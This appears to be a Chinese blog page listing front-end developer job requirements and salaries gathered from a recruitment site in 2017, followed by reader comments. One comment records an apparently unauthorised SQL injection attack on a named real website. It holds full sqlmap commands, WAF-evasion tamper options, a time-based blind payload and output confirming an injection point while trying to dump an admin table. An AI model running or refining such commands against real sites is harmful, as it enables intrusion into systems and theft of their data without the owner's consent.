Recruit Info

本文概述了前端开发岗位的技能要求,包括对HTML5、CSS3、JavaScript等技术的掌握程度,以及对React.js、Vue.js等框架的应用能力。强调了对Web标准的理解和对用户体验的关注。

  1. 精通HTML、HTML5、CSS、CSS3;
  2. 研究Web前端技术的发展,前沿技术、工具的调研,相关技术、框架的培训。
  3. 对React.js,VUE.js,Angular.js等MVVM框架能熟练运用至少一种,且了解其基本原理
  4. 理解并掌握Javascript语言核心技术DOM、BOM、Ajax、JSON等,对Javascript框架应用(如jQuery/bootstrap等)有一定的经验;
  5. 熟悉Python/Django优先;
  6. 在熟悉JQuery等开源框架的基础上,对原生Javascript也能熟练编写.了解其他常见的js库 (EXTjs、Prototype、YUI等)
  7. 精通css,div,html,js,精通jquery, bootstrap等主流前端框架;
  8. 精通Javascript语言核心技术DOM、Function、闭包、Ajax、JSON等,掌握面向对象编程思想;
  9. 熟悉各种Web前端技术,精通JQuery,熟悉其中一种框架比如 AngularJS、VueJs、 knockoutJS、ReactJS;
  10. 熟悉SVG,Canvas等相关技术,熟悉Echarts、Highcharts、D3.js等数据可视化技术
  11. 熟悉W3C标准,对表现与数据分离、Web语义化等有深刻理解
  12. 熟悉前端构建工具如:Grunt、Gulp、FIS3;
  13. 熟悉前端模块化开发如:RequireJS、SeaJS 优先;
  14. 熟悉NodeJS优先。
  15. Webview
  16. 掌握一定的功能测试和性能测试方法,使用过jest或者mocha等相应的单元测试工具
  17. 熟悉Egret 或者 As3.0
  18. 熟练使用as3,并开发(上线)过一款以上游戏


岗位职责:

1、负责开发网站和手机终端的交互界面、建设前端系统架构;

2、负责与产品、运营等部门密切合作,设计实现产品的用户界面,优化前端性能,确保Web用户界面在多浏览器环境中正常工作; 

3、负责编写前端设计HTML、css、JavaScript,根据需求将页面在系统中调试;

4、负责JS前端页面交互设计,提高用户体验。前端样式和脚本的模块设计及优化;

5、了解后端架构,与后端工程师配合,为项目提供最优化的技术解决方案。

熟悉W3C标准与ES规范,熟悉Web语义化,会使用 git ,了解容器化部署

熟练掌握盒模型、常用布局以及浏览器和移动设备兼容性

熟练使用各种调试、抓包工具,能独立分析、解决和归纳问题



任职要求:

1、大学专科或以上学历,计算机等相关专业;

2、有两年以上互联网产品前端开发经验;

3、熟练掌握HTML、CSS、JavaScript开发,熟悉W3C标准与ES规范,熟悉Web语义化,会使用 git ,了解容器化部署;

4、熟练掌握盒模型、常用布局以及浏览器和移动设备兼容性,擅长使用 google 解决自己遇到的问题,对运维体系有所了解

5、熟练使用至少一种JS框架(jquery、jquery easyui、bootstrap、amaze ui等前端框架 ),掌握其原理,能独立开发常用组件;

6、熟练使用各种调试、抓包工具,能独立分析、解决和归纳问题;

7、具有java编程的实战经验,具有移动设备调试经验;

8、熟悉 Vue.js 任一前端框架,以及 Element/Bootstrap 等界面库,了解/ React / Angular;

9、具有成熟实际项目开发经验;

10、具备良好的学习能力、沟通能力、分析及解决问题能力,优秀的团队协作精神,能淡定的对待产品经理提出的各种需求。

职位月薪:10000~15000元/月

工作地址:

北京市海淀区上地三街9号金隅嘉华大厦


-----------------------------------------------------------------------------------------------------------------



任职要求:

3年-5年前端工作经验(近三年都是前端);

AngularJS必须在项目中用过半年以上;

原生JS面向对象编程经验;

熟悉React等框架、ECharts的话可以加分;

能够封装前端控件可以加分;

职位月薪:15000元/月

-----------------------------------------------------------------------------------------------------------------

理解RIA,有Ajax相关的实践经验,对React.js,VUE.js,Angular.js等MVVM框架能熟练运用至少一种,且了解其基本原理;

岗位职责:
1、配合交互设计师及视觉设计师实现交互效果,配合后台工程师完成应用开发;
2、实现海量用户产品一流的Web界面,优化代码并保持良好兼容性;
3、设计并实现海量用户产品的交互,提高网页性能和用户体验;
4、JavaScript程序模块开发,通用类库、框架编写能力。

任职要求:
1、熟悉WEB前端技术,对符合WEB标准的网站重构有丰富经验,有成功作品;
2、理解并掌握Javascript语言核心技术DOM、BOM、Ajax、JSON等,对Javascript框架应用(如jQuery/bootstrap等)有一定的经验;
3、熟悉Python/Django优先;
4、对CSS/Javascript性能优化、解决多浏览器兼容性问题有一定的经验;
5、对用户体验、交互操作流程、及用户需求有一定了解;
6、具备良好的服务意识、责任心、较强的学习能力、优秀的团队沟通与协作能力。

职位月薪:20000元~30000/月

-----------------------------------------------------------------------------------------------------------------

岗位描述:

 1、对Web前端开发充满兴趣,熟练掌握各种WEB前端技术:Javascript/HTML5/CSS等

 2、熟练掌握前端和后端的数据交换机制 

 3、在熟悉JQuery等开源框架的基础上,对原生Javascript也能熟练编写.了解其他常见的js库 (EXTjs、Prototype、YUI等); 

 4、能独立设计js框架优先; 

 5、工作踏实肯投入、对工作有很强的责任心,具有很强的学习能力和对新技术的追求精神,对用户交互设计有浓厚的兴趣,并乐于钻研Web前端效果的技巧与实现。 


岗位要求:

 1. dz 以上学历,两年以上工作经验,对JavaScript语言有十分深入的了解;

 2. 掌握至少一门服务器端编程语言,对OOP有一定的认识,对前后端分工与合作有不错的认知;  

 3. 具备优秀的编程能力,对富客户端架构具有相当的了解;

 4. 熟练掌握HTML/CSS/XML/JSON,对HTTP协议足够熟悉;

 5. 对互联网产品有着良好的感觉,对人机交互、用户体验等有较为深入的了解;

 6. 思路清晰,具备良好的沟通能力和理解能

职位月薪:15000元~20000/月

-----------------------------------------------------------------------------------------------------------------


岗位职责:
1、负责公司产品WEB端应用设计与开发;
2、用HTML、CSS、JS技术,负责前端工作的整体架构设计与具体细节实施;
3、参与产品的框架设计,并能制定相关的前端开发流程和规范,编写文档;
4、与UI设计师、后端开发人员紧密配合,完成产品的整体开发。

任职资格:
1、2年以上相关工作经验,211院校统招本科以上学历,计算机相关专业; 
2、精通css,div,html,js,精通jquery, bootstrap等主流前端框架;
3、熟悉W3C标准,对表现与数据分离、Web语义化等有深刻理解; 
4、熟悉html,掌握基本标签的语义,掌握基本的SEO常识,对html5在当前项目的应用有自己的理解。

职位月薪:15000元~20000/月

-----------------------------------------------------------------------------------------------------------------


岗位职责:

1. 负责公司产品线Web产品的前端开发工作;

2. 与设计团队配合,把设计图转化为静态页面, 编写兼容各主流浏览器页面代码;

3. 根据业务需求,实现页面的动态交互功能,提高网页性能和用户体验;;

4  前端组件的设计与实现,程序模块开发,通用类库、框架编写能力,相关框架的定制与修改;。

5. 项目前端性能分析与完善善,负责Web前端开发规范的制定;


任职要求:

1. 3年以上前端相关技术开发经验,熟悉W3C标准,大学统招本科及以上;

2. 精通HTML、HTML5、CSS、CSS3;

3. 精通Javascript语言核心技术DOM、Function、闭包、Ajax、JSON等,掌握面向对象编程思想;

4. 熟悉各种Web前端技术,精通JQuery,熟悉其中一种框架比如 AngularJS、VueJs、 knockoutJS、ReactJS;

5  熟悉SVG,Canvas等相关技术,熟悉Echarts、Highcharts、D3.js等数据可视化技术

6. 熟悉W3C标准,对表现与数据分离、Web语义化等有深刻理解

7. 熟悉前端构建工具如:Grunt、Gulp、FIS3;

8. 熟悉前端模块化开发如:RequireJS、SeaJS 优先;

9. 熟悉NodeJS优先。

职位月薪:15000元~30000/月

-----------------------------------------------------------------------------------------------------------------



以上内容从2017年02月份 从智联招聘网站 摘取下来的,可以窥出一角,新的前端技术在大多数公司还在初级阶段,老的技术还活得生龙活虎!

函数化编程还需要过度一段时间,有些前端的高级技术是服务端编程人员揽做!希望前端编程人员努力代替之。



用了你这两个语句还是这样D:\Software\OneFox\Fox-tools\tools\gui_scan\sqlmap>python sqlmap.py -u "https://www.xyrczhfw.cn/recruit/shzp/id/1/flid/1" --technique=T --time-sec=3 --timeout=10 --dbms=mysql --level=5 --risk=3 --prefix="if(now()=sysdate()," --suffix=",0)" --tamper=between,randomcase,charencode,space2comment --no-cast --threads=1 --retries=3 -D rczfdata -T th_admin --columns --batch ___ __H__ ___ ___[.]_____ ___ ___ {1.9.1.2#dev} |_ -| . [)] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:25:47 /2025-07-02/ [09:25:47] [INFO] loading tamper module 'between' [09:25:47] [INFO] loading tamper module 'randomcase' [09:25:47] [INFO] loading tamper module 'charencode' [09:25:47] [INFO] loading tamper module 'space2comment' it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y [09:25:47] [WARNING] using too many tamper scripts is usually not a good idea [09:25:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data' do you want to try URI injections in the target URL itself? [Y/n/q] Y [09:25:48] [INFO] testing connection to the target URL [09:25:48] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://www.xyrczhfw.cn/recruit/shzp/id/1/flid/if(now()=sysdate(), (CASE WHEN (9059=9059) THEN SLEEP(3) ELSE 9059 END),0) --- [09:25:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [09:25:48] [INFO] testing MySQL [09:25:49] [INFO] confirming MySQL [09:25:49] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.0 [09:25:49] [INFO] fetching columns for table 'th_admin' in database 'rczfdata' [09:25:49] [INFO] resumed: 22 [09:25:49] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done) [09:26:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [09:26:03] [INFO] retrieved: [09:26:03] [INFO] retrieved: [09:26:03] [INFO] retrieved: [09:26:03] [INFO] retrieved: [09:26:03] [INFO] retrieved: [09:26:03] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:04] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:05] [INFO] retrieved: [09:26:06] [INFO] retrieved: [09:26:06] [INFO] retrieved: [09:26:06] [INFO] retrieved: [09:26:06] [WARNING] unable to retrieve column names for table 'th_admin' in database 'rczfdata' do you want to use common column existence check? [y/N/q] N [09:26:06] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 66 times [09:26:06] [INFO] fetched data logged to text files under 'C:\Users\Prince\AppData\Local\sqlmap\output\www.xyrczhfw.cn'
07-03
https://www.xyrczhfw.cn/recruit/shzp/id/1/flid/if(now()=sysdate(),sleep(5),0)用这个测试,过了没问题,用你这个python sqlmap.py -u "https://www.xyrczhfw.cn/recruit/shzp/id/1/flid/1" \ --technique=B --dbms=mysql --level=3 --risk=2 \ --prefix="if(now()=sysdate()," --suffix=",0)" \ --tamper=randomcase,space2comment,charencode,between \ --threads=1 --timeout=15 --retries=5 \ -D rczfdata -T th_admin --columns --batch 出现D:\Software\OneFox\Fox-tools\tools\gui_scan\sqlmap>python sqlmap.py -u "https://www.xyrczhfw.cn/recruit/shzp/id/1/flid/1" --technique=B --dbms=mysql --level=3 --risk=2 --prefix="if(now()=sysdate()," --suffix=",0)" --tamper=randomcase,space2comment,charencode,between --threads=1 --timeout=15 --retries=5 -D rczfdata -T th_admin --columns --batch ___ __H__ ___ ___[(]_____ ___ ___ {1.9.1.2#dev} |_ -| . [,] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:29:47 /2025-07-02/ [09:29:47] [INFO] loading tamper module 'randomcase' [09:29:47] [INFO] loading tamper module 'space2comment' [09:29:47] [INFO] loading tamper module 'charencode' [09:29:47] [INFO] loading tamper module 'between' it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y [09:29:47] [WARNING] using too many tamper scripts is usually not a good idea [09:29:47] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data' do you want to try URI injections in the target URL itself? [Y/n/q] Y [09:29:47] [INFO] testing connection to the target URL [09:29:48] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS [09:29:48] [INFO] testing if the target URL content is stable [09:29:48] [INFO] target URL content is stable [09:29:48] [INFO] testing if URI parameter '#1*' is dynamic [09:29:49] [WARNING] URI parameter '#1*' does not appear to be dynamic [09:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable [09:29:50] [INFO] testing for SQL injection on URI parameter '#1*' [09:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:29:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [09:29:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [09:29:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:29:51] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [09:29:51] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [09:29:51] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [09:29:51] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [09:29:51] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [09:29:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [09:29:52] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [09:29:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [09:29:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:29:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [09:29:53] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:29:53] [WARNING] URI parameter '#1*' does not seem to be injectable other non-custom parameters found. Do you want to process them too? [Y/n/q] Y [09:29:53] [INFO] testing if parameter 'User-Agent' is dynamic [09:29:53] [WARNING] parameter 'User-Agent' does not appear to be dynamic [09:29:53] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable [09:29:54] [INFO] testing for SQL injection on parameter 'User-Agent' [09:29:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:29:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [09:29:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [09:29:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:29:56] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [09:29:56] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [09:29:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [09:29:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [09:29:58] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [09:29:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [09:29:58] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [09:29:59] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [09:29:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:29:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [09:30:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:30:00] [WARNING] parameter 'User-Agent' does not seem to be injectable [09:30:00] [INFO] testing if parameter 'Referer' is dynamic [09:30:00] [WARNING] parameter 'Referer' does not appear to be dynamic [09:30:00] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable [09:30:00] [INFO] testing for SQL injection on parameter 'Referer' [09:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:30:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' [09:30:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)' [09:30:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:30:01] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' [09:30:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)' [09:30:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)' [09:30:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)' [09:30:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause' [09:30:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [09:30:02] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [09:30:02] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [09:30:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:30:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [09:30:03] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [09:30:03] [WARNING] parameter 'Referer' does not seem to be injectable [09:30:03] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique' [09:30:03] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 14 times, 404 (Not Found) - 6 times
07-03
SELECT LOCATION, COUNT(*) AS count , ROUND(COUNT(*) * 100.0 / SUM(COUNT(*)) OVER (), 2) AS LOCATIONPERCENTAGE FROM (WITH LatestInvitation AS ( SELECT b.projectno, b.yysj, b.yyjg, b.wcxyy, b.wcxyybz, ROW_NUMBER() OVER (PARTITION BY b.projectno ORDER BY b.yysj DESC) AS rn FROM tb_dhr_sftz_invateinfo b ), InvitationCount AS ( SELECT projectno, COUNT(*) AS total_invitations FROM tb_dhr_sftz_invateinfo GROUP BY projectno ), AbandonContract AS ( SELECT projectno, FQYY, QYFQQYBZ, QYZT FROM tb_dhr_sftz_baseinfo ), dayDYYdifference AS ( SELECT operatedate,Row_Number() OVER (PARTITION BY projectno ORDER BY operatedate DESC) AS rndyy,projectno FROM bidw1.sor_ehr_oa_recruit_node_detail ORDER BY projectno ) SELECT Row_Number() OVER (ORDER BY a.projectno DESC) AS xh ,a.projectno, a.STATUS,LAST_NAME,DZYX,xl_wb,BYYX, CASE WHEN EXISTS (SELECT 1 FROM tb_dhr_sftz_schoolloc_info sh WHERE sh.schoolname=BYYX) THEN '上海' ELSE '外地' END AS location, CASE WHEN EXISTS (SELECT 1 FROM tb_dhr_sftz_yxlx_info ss WHERE ss.schoolName=BYYX) THEN (SELECT ss.schoolType FROM tb_dhr_sftz_yxlx_info ss WHERE ss.schoolName=BYYX ) ELSE '普通' END AS schoolType, YDDH,tjsx,HR_SFMX, info12, n_offer_qydw,hr_jylx, XB,DEPT1,DEPT2,DEPT3,NAPBMLS,NAPGZDD,DEPT1 || '-' || DEPT2 || '-' || DEPT3 AS BMPJ, To_Char(li.yysj,'yyyy/mm/dd hh24:mi:ss') AS latest_invite_time, li.yyjg AS latest_invite_result, li.wcxyy,li.wcxyybz,ac.FQYY,ac.QYFQQYBZ,ac.QYZT, ic.total_invitations, DYY.operatedate,To_Date(To_Char(SYSDATE,'YYYYMMDD'),'YYYYMMDD')-To_Date(DYY.operatedate,'YYYY-MM-DD')AS daydifference FROM bidw1.sor_oa_recruit_process_list a LEFT JOIN LatestInvitation li ON a.projectno = li.projectno AND li.rn = 1 LEFT JOIN InvitationCount ic ON a.projectno = ic.projectno LEFT JOIN AbandonContract ac ON a.projectno = ac.projectno LEFT JOIN dayDYYdifference DYY ON a.projectno = DYY.projectno AND DYY.rndyy = 1 WHERE status='正式Offer' AND tjsx='合格' AND hr_jylx NOT IN '有经验' AND hr_jylx IN '2026届' AND (li.yyjg NOT IN ('出席') OR li.yyjg IS NULL) ORDER BY projectno DESC ) GROUP BY LOCATION
最新发布
10-29
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值